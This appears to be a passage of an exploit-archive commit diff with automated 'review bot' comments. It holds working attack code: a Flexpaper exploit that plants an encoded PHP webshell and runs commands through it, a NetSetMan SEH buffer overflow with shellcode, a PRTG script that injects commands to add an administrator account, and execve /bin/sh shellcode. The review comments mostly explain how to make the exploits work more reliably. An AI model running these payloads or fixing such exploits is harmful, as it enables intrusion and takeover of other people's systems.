shellcode = "%69%64%3b%65%63%68%6f%20%50%44%39%77%61%48%41%4b%43%69%52%72%5a%58%6b%67%50%53%41%6b%58%30%64%46%56%46%73%6e%59%57%4e%6a%5a%58%4e%7a%4a%31%30%37%43%67%70%70%5a%69%67%6b%61%32%56%35%50%54%30%6e%4d%44%6b%34%4e%7a%63%7a%4e%7a%59%78%4d%54%59%30%4e%7a%49%33%4e%44%49%33%4f%44%51%7a%4d%6a%51%34%4d%6a%52%74%65%47%31%74%65%47%30%6e%4b%58%73%4b%43%67%6c%6c%59%32%68%76%49%48%4e%6f%5a%57%78%73%58%32%56%34%5a%57%4d%6f%59%6d%46%7a%5a%54%59%30%58%32%52%6c%59%32%39%6b%5a%53%67%6b%58%30%64%46%56%46%73%6e%59%32%31%6b%4a%31%30%70%4b%54%73%4b%43%6e%30%37%43%6a%38%2b%43%67%3d%3d%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%69%67%65%72%5f%73%68%65%6c%6c%2e%70%68%70%3b%69%64"
print "[*] Uploading webshell.."
url2 = url+"/php/setup.php?step=2&PDF2SWF_PATH="+shellcode
r2 = requests.get(url2)
print "[*] Checking if shell is uploaded successfully"
webshell = url+ '/php/tiger_shell.php'
check_shell = requests.get(webshell)
if check_shell.status_code == 200:
print "[*] We got a shell"
else:
print "[-] Exploit failed, die"
sys.exit(2)
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
while True:
cmd = raw_input("enter cmd>>")
cmd = cmd.strip()
cmd = cmd.encode('base64').strip().replace("\n","")
link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()
#print link
try:
response = urllib2.urlopen(link, context=ctx)
page = response.read()
print page
except Exception as exc:
print exc
continue
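Review bot: the script is Python 2 only (`print` statements, `urllib2`, `raw_input`, `.encode('base64')`) but the shebang is `#!/usr/bin/env python`, which resolves to Python 3 on current systems; use `python2` or port it. `print sys.exit(1)` in the usage branch exits before `print` ever receives a value; drop the `print`. The responses `r1`, `rx` and `r2` are never checked, and the only success test is `check_shell.status_code == 200`, which a catch-all or default page also satisfies. `shellcode` is an opaque percent-encoded blob, so a reviewer cannot tell what is written to `tiger_shell.php` without decoding it; build the value from readable components and URL-encode at runtime. The `PDF_Directory` value `/var/www/html/flex2.3.6/flexpaper/pdf` is the author's lab path and is undocumented. TLS verification is disabled for the `urllib2` loop (`ctx.verify_mode = ssl.CERT_NONE`) while the `requests` calls keep it on, so the two halves behave differently against the same host. For defenders, the fixed `tiger_shell.php` filename, the `access=09877376116472742784324824mxmmxm` parameter and the `setup.php?step=2&PDF2SWF_PATH=` request are stable strings to alert on.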


@ -107,7 +107,7 @@ int AddAccountToAdminGroup(HANDLE hTokenElevated)
printf("\n[*] Creating new process...");
// The command or binary file to be executed can be changed here
sprintf(netcommand, "powershell.exe .\\rev.ps1");
sprintf(netcommand, "calc.exe");
if (!CreateProcessAsUser(hTokenElevated, NULL, netcommand, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
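Review bot: with the `+`/`-` markers stripped by the rendering, the hunk shows two back-to-back `sprintf(netcommand, ...)` calls, `"powershell.exe .\\rev.ps1"` and `"calc.exe"`; the `-107,7 +107,7` header says one replaced the other, so this is a payload swap that the commit message (`10 changes to exploits/shellcodes`) does not mention, and the file has no header in this view to identify it. Either way `sprintf` writes into `netcommand` with no bound; `snprintf(netcommand, sizeof(netcommand), ...)` is the safe form, and if `netcommand` is a pointer rather than an array its size should be passed explicitly.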

exploits/windows/local/46530.py Executable file

@ -0,0 +1,109 @@
#Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)
#Exploit Author: Devin Casadey
#Discovery Date: 2019-03-11
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows XP SP3
#-------------------------------------------------------------------------------
#Steps to replicate:
#1. Run the Python code below which outputs two payload .txt files.
#2. Open NetSetMan
#3. Enable "Workgroup" for both the "[Double Click!]" tab and "SET1" tab
#4. Paste contents of "payload2.txt" into the "Workgroup" field in the "SET1" tab.
#5. Paste contents of "payload1.txt" into the "Workgroup" field in the "[Double Click!]" tab.
#6. Click "Activate"
#7. ...
#8. Profit
#This is a unicode SEH overflow, but the buffer is too small for a unicode encoded reverse shell payload.
#Therefore, an egghunter is implemented to locate an alphanumeric encoded payload stored in memory.
#-------------------------------------------------------------------------------
# msfvenom -p windows/exec cmd=calc.exe -b "\x00" -e x86/alpha_mixed -f python
#-v shellcode EXITFUNC=seh BufferRegister=EDI
#Payload size: 440 bytes
shellcode = ""
shellcode = "w00tw00t"
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x69\x6c\x59\x78\x6d\x52\x57\x70"
shellcode += "\x43\x30\x75\x50\x53\x50\x6c\x49\x49\x75\x36\x51"
shellcode += "\x39\x50\x71\x74\x6c\x4b\x56\x30\x46\x50\x4e\x6b"
shellcode += "\x71\x42\x46\x6c\x4e\x6b\x76\x32\x57\x64\x6e\x6b"
shellcode += "\x44\x32\x34\x68\x76\x6f\x6d\x67\x43\x7a\x71\x36"
shellcode += "\x44\x71\x6b\x4f\x6e\x4c\x57\x4c\x65\x31\x33\x4c"
shellcode += "\x47\x72\x36\x4c\x75\x70\x6f\x31\x5a\x6f\x34\x4d"
shellcode += "\x67\x71\x39\x57\x48\x62\x4a\x52\x43\x62\x46\x37"
shellcode += "\x6c\x4b\x32\x72\x32\x30\x6c\x4b\x71\x5a\x45\x6c"
shellcode += "\x6e\x6b\x70\x4c\x32\x31\x73\x48\x4a\x43\x63\x78"
shellcode += "\x56\x61\x6e\x31\x56\x31\x6e\x6b\x30\x59\x57\x50"
shellcode += "\x35\x51\x79\x43\x6c\x4b\x72\x69\x55\x48\x4d\x33"
shellcode += "\x46\x5a\x52\x69\x4e\x6b\x77\x44\x6e\x6b\x76\x61"
shellcode += "\x68\x56\x75\x61\x6b\x4f\x6c\x6c\x59\x51\x78\x4f"
shellcode += "\x66\x6d\x77\x71\x4b\x77\x30\x38\x6d\x30\x51\x65"
shellcode += "\x58\x76\x53\x33\x43\x4d\x69\x68\x67\x4b\x73\x4d"
shellcode += "\x67\x54\x50\x75\x4b\x54\x62\x78\x4c\x4b\x73\x68"
shellcode += "\x76\x44\x57\x71\x68\x53\x71\x76\x6e\x6b\x56\x6c"
shellcode += "\x72\x6b\x6e\x6b\x43\x68\x47\x6c\x66\x61\x6e\x33"
shellcode += "\x6e\x6b\x76\x64\x6c\x4b\x36\x61\x6a\x70\x6d\x59"
shellcode += "\x31\x54\x76\x44\x66\x44\x63\x6b\x61\x4b\x65\x31"
shellcode += "\x51\x49\x50\x5a\x73\x61\x59\x6f\x79\x70\x51\x4f"
shellcode += "\x71\x4f\x43\x6a\x4e\x6b\x55\x42\x5a\x4b\x4c\x4d"
shellcode += "\x73\x6d\x61\x7a\x37\x71\x6c\x4d\x6c\x45\x58\x32"
shellcode += "\x55\x50\x45\x50\x43\x30\x36\x30\x52\x48\x64\x71"
shellcode += "\x6c\x4b\x32\x4f\x4e\x67\x59\x6f\x79\x45\x4f\x4b"
shellcode += "\x6b\x4e\x56\x6e\x75\x62\x48\x6a\x65\x38\x6f\x56"
shellcode += "\x4a\x35\x6d\x6d\x6f\x6d\x6b\x4f\x68\x55\x75\x6c"
shellcode += "\x53\x36\x43\x4c\x36\x6a\x4b\x30\x4b\x4b\x6d\x30"
shellcode += "\x34\x35\x77\x75\x4f\x4b\x62\x67\x64\x53\x30\x72"
shellcode += "\x72\x4f\x30\x6a\x53\x30\x43\x63\x4b\x4f\x68\x55"
shellcode += "\x42\x43\x30\x61\x70\x6c\x31\x73\x44\x6e\x30\x65"
shellcode += "\x32\x58\x51\x75\x55\x50\x41\x41"
egghunter =(
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIA"
"IAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30A"
"PB944JBC6SQGZKOLO0B0RQZOSR88MNNOLKUPZSDJO6XT7NPNP3DTKKJ6OD5JJ"
"6OBUK7KOYWLJA"
)
regPrep = (
"\x63" #nop/align
"\x55" #push ebp
"\x62" #nop/align
"\x58" #pop eax
"\x62" #nop/align
"\x05\x14\x11" #add eax, 0x11001400
"\x62" #nop/align
"\x2d\x13\x11" #sub eax, 0x11001300
"\x62" #nop/align
"\x50" #push eax
"\x62" #nop/align
"\xc3") #ret
buffer = ""
buffer += "\x61" * 75 #junk
buffer += "\x62" * 1 #nop
#0x00590058 : pop ebx # pop ebp # ret 0x08 | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [netsetman.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.7.1.0 (C:\Program Files\NetSetMan\netsetman.exe)
buffer += "\x58\x59" #SEH overwrite to pop-pop-ret instruction
buffer += regPrep
buffer += "\x62" * 108 #offset to egghunter
buffer += egghunter
#Write initial SEH overflow payload + egghunter with venetian shellcode
f = open('payload1.txt','w')
f.write(buffer)
f.close()
#Egg + alphanumeric encoded shellcode payload
g = open('payload2.txt', 'w')
g.write(shellcode)
g.close()
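Review bot: the two `open(..., 'w')` calls at the end write the payloads in text mode, which only produces the intended bytes under Python 2; under Python 3 the `str` literals would be UTF-8 encoded on write, so the `\xc3` (`ret`) in `regPrep` would become two bytes and the SEH layout would shift. Opening both files with `'wb'` and making `shellcode`, `egghunter`, `regPrep` and `buffer` byte literals (`b"..."`) keeps the output byte-exact on either interpreter. A short comment on `regPrep` stating its net effect (the `add eax, 0x11001400` / `sub eax, 0x11001300` pair leaves `eax = ebp + 0x100`) would also let a reader verify the hop to the egghunter without re-deriving it.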
@ -0,0 +1,97 @@
#!/bin/bash
echo -e "\n\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Authenticated PRTG network Monitor remote code execution [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Date: 11/03/2019 [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\e[00;32m[*] Vendor Homepage: https://www.paessler.com/prtg [*] \e[00m"
echo -e "\e[00;32m[*] Version: 18.2.38 [*] \e[00m"
echo -e "\e[00;32m[*] CVE: CVE-2018-9276 [*] \e[00m"
echo -e "\e[00;32m[*] Reference: https://www.codewatch.org/blog/?p=453 [*] \e[00m"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
echo -e "\n\e[00;32m# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.\n# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' \e[00m\n"
echo -e "\e[00;33m[+]#########################################################################[+] \e[00m"
usage()
{
echo -e '\e[00;35m EXAMPLE USAGE:\e[00m\e[00;32m ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1" \e[00m\n'
}
create_file()
{
data="name_=create_file&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.bat&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0APro
be%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
fireone=$(curl -s -H "Referer: $url/editnotification.htm?id=new&tabid=1" "X-Requested-With: XMLHttpRequest" -X POST --data "$data" --cookie "$cookie" $url/editsettings)
# use bat file; save file to C:\Users\Public\tester.txt change accordingly
echo "$fireone"
echo -e "\e[00;32m [*] file created \e[00m"
}
ex_notify_1()
{
for i in range {0..50}; do
fireone=$(curl -s -H "Referer: $url/myaccount.htm?tabid=2" "X-Requested-With: XMLHttpRequest" -X POST --data "id=20$i" --cookie "$cookie" $url/api/notificationtest.htm)
# find the id value usually starts at 20.. but may need to change range accordingly
done
echo -e "\e[00;32m [*] sending notification wait....\e[00m"
}
create_user()
{
data2="name_=create_user&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+
Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
firetwo=$(curl -s -H "Referer: $url/editnotification.htm?id=new&tabid=1" "X-Requested-With: XMLHttpRequest" -X POST --data "$data2" --cookie "$cookie" $url/editsettings)
# use ps1 script to execute code; adding a new user with username pentest and password P3nT3st!
echo "$firetwo"
echo -e "\e[00;32m [*] adding a new user 'pentest' with password 'P3nT3st' \e[00m"
}
ex_notify_2()
{
for i in range {0..50}; do
fire2=$(curl -s -H "Referer: $url/myaccount.htm?tabid=2" "X-Requested-With: XMLHttpRequest" -X POST --data "id=20$i" --cookie "$cookie" $url/api/notificationtest.htm)
# find the id value usually starts at 20.. but may need to change range accordingly
done
echo -e "\e[00;32m [*] sending notification wait....\e[00m"
}
add_user_admin()
{
data3="name_=user_admin&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue
%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2"
firethree=$(curl -s -H "Referer: $url/editnotification.htm?id=new&tabid=1" "X-Requested-With: XMLHttpRequest" -X POST --data "$data3" --cookie "$cookie" $url/editsettings)
echo "$firethree"
echo -e "\e[00;32m [*] adding a user pentest to the administrators group \e[00m"
}
ex_notify_3()
{
for i in range {0..50}; do
fire3=$(curl -s -H "Referer: $url/myaccount.htm?tabid=2" "X-Requested-With: XMLHttpRequest" -X POST --data "id=20$i" --cookie "$cookie" $url/api/notificationtest.htm)
# find the id value usually starts at 20.. but may need to change range accordingly
done
echo -e "\e[00;32m [*] sending notification wait....\e[00m"
echo -e "\n\n\e[00;32m [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun! \e[00m"
}
if [[ $# -eq 0 ]] ; then
usage
exit 0
fi
while getopts "hu:c:" option; do
case "${option}" in
c) cookie=${OPTARG};;
h) usage;;
u) url=${OPTARG};;
*) usage; exit;;
esac
done
create_file
ex_notify_1
sleep 3
create_user
ex_notify_2
sleep 3
add_user_admin
ex_notify_3
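Review bot: every `curl` call in `create_file`, `create_user`, `add_user_admin` and the three `ex_notify_*` loops passes `"X-Requested-With: XMLHttpRequest"` as a bare argument after `-H "Referer: ..."`, so curl treats it as a second URL rather than a header; each one needs its own `-H`. The loops `for i in range {0..50}; do` also iterate over the literal word `range` before the numbers, sending a request with `id=20range`; drop `range`. Two smaller points: `h) usage;;` falls through into the exploit instead of exiting, and nothing checks that both `-u` and `-c` were supplied before `create_file` runs with an empty `$url`/`$cookie`; adding `[[ -z $url || -z $cookie ]] && { usage; exit 1; }` after the `getopts` loop would catch that.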
@ -6351,6 +6351,7 @@ id,file,description,date,author,type,platform,port
46502,exploits/linux/dos/46502.txt,"Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem",2019-03-06,"Google Security Research",dos,linux,
46503,exploits/android/dos/46503.txt,"Android - binder Use-After-Free via racy Initialization of ->allow_user_free",2019-03-06,"Google Security Research",dos,android,
46504,exploits/android/dos/46504.txt,"Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass",2019-03-06,"Google Security Research",dos,android,
46529,exploits/linux/dos/46529.c,"Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak",2019-03-11,wally0813,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10351,6 +10352,8 @@ id,file,description,date,author,type,platform,port
46437,exploits/windows/local/46437.txt,"Memu Play 6.0.7 - Privilege Escalation",2019-02-21,"Alejandra Sánchez",local,windows,
46507,exploits/windows/local/46507.py,"Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)",2019-03-07,Hodorsec,local,windows,
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,
46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware,
46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40966,3 +40969,7 @@ id,file,description,date,author,type,platform,port
46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,
46518,exploits/windows/webapps/46518.txt,"McAfee ePO 5.9.1 - Registered Executable Local Access Bypass",2019-03-08,leonjza,webapps,windows,
46520,exploits/php/webapps/46520.txt,"DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery",2019-03-08,ManhNho,webapps,php,
46525,exploits/multiple/webapps/46525.rb,"Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)",2019-03-11,AkkuS,webapps,multiple,
46526,exploits/jsp/webapps/46526.rb,"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)",2019-03-11,AkkuS,webapps,jsp,
46527,exploits/windows/webapps/46527.sh,"PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution",2019-03-11,M4LV0,webapps,windows,80
46528,exploits/php/webapps/46528.py,"Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution",2019-03-11,redtimmysec,webapps,php,
@ -950,3 +950,5 @@ id,file,description,date,author,type,platform
46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86
46519,shellcodes/linux_x86/46519.c,"Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)",2019-03-08,"Daniele Votta",shellcode,linux_x86
46523,shellcodes/linux_x86/46523.py,"Linux/x86 - MMX-XOR Encoder / Decoder execve(/bin/sh) Shellcode (44 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
46524,shellcodes/linux_x86/46524.c,"Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
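Review bot: the new row `46523,shellcodes/linux_x86/46523.py,"Linux/x86 - MMX-XOR Encoder / Decoder execve(/bin/sh) Shellcode (44 bytes)"` does not match the file it indexes: the added `shellcodes/linux_x86/46523.py` is a C program (`#include<stdio.h>`, `unsigned char code[]`, `int main()`) whose header describes a NOT encoder/decoder (`NOT-Encoder.py`, `not BYTE PTR [esi]`), not an MMX-XOR one, and the Python encoder only appears inside a C block comment. Either rename the file to `46523.c` and retitle the description, or split the Python encoder out into the `.py` file the index points to.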
shellcodes/linux_x86/46523.py Executable file
@ -0,0 +1,99 @@
/*
; Date: 02/03/2019
; NOT-Encoder.py
; Author: Daniele Votta
; Description: This program encode shellcode with NOT technique.
; Tested on: i686 GNU/Linux
; Shellcode Length:25
#!/usr/bin/python
# Python NOT Encoder
# Execve /bin/sh
shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode...'
for x in bytearray(shellcode):
# NOT Encoding
y = ~x
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' % (y & 0xff)
print encoded +"\n"
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
*/
#include<stdio.h>
#include<string.h>
/*
; NOT-Decoder.asm
; Author: Daniele Votta
; Description: This program decode shellcode with NOT technique.
; Tested on: i686 GNU/Linux
; Shellcode Length:44
; JMP | CALL | POP | Techniques
NOT-Decoder: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: eb 0c jmp 804808e <call_decoder>
08048082 <decoder>:
8048082: 5e pop esi
8048083: 31 c9 xor ecx,ecx
8048085: b1 19 mov cl,0x19
08048087 <decode>:
8048087: f6 16 not BYTE PTR [esi]
8048089: 46 inc esi
804808a: e2 fb loop 8048087 <decode>
804808c: eb 05 jmp 8048093 <EncodedShellcode>
0804808e <call_decoder>:
804808e: e8 ef ff ff ff call 8048082 <decoder>
08048093 <EncodedShellcode>:
8048093: ce into
8048094: 3f aas
8048095: af scas eax,DWORD PTR es:[edi]
8048096: 97 xchg edi,eax
8048097: d0 d0 rcl al,1
8048099: 8c 97 97 d0 9d 96 mov WORD PTR [edi-0x69622f69],ss
804809f: 91 xchg ecx,eax
80480a0: 76 1c jbe 80480be <__bss_start+0x12>
80480a2: af scas eax,DWORD PTR es:[edi]
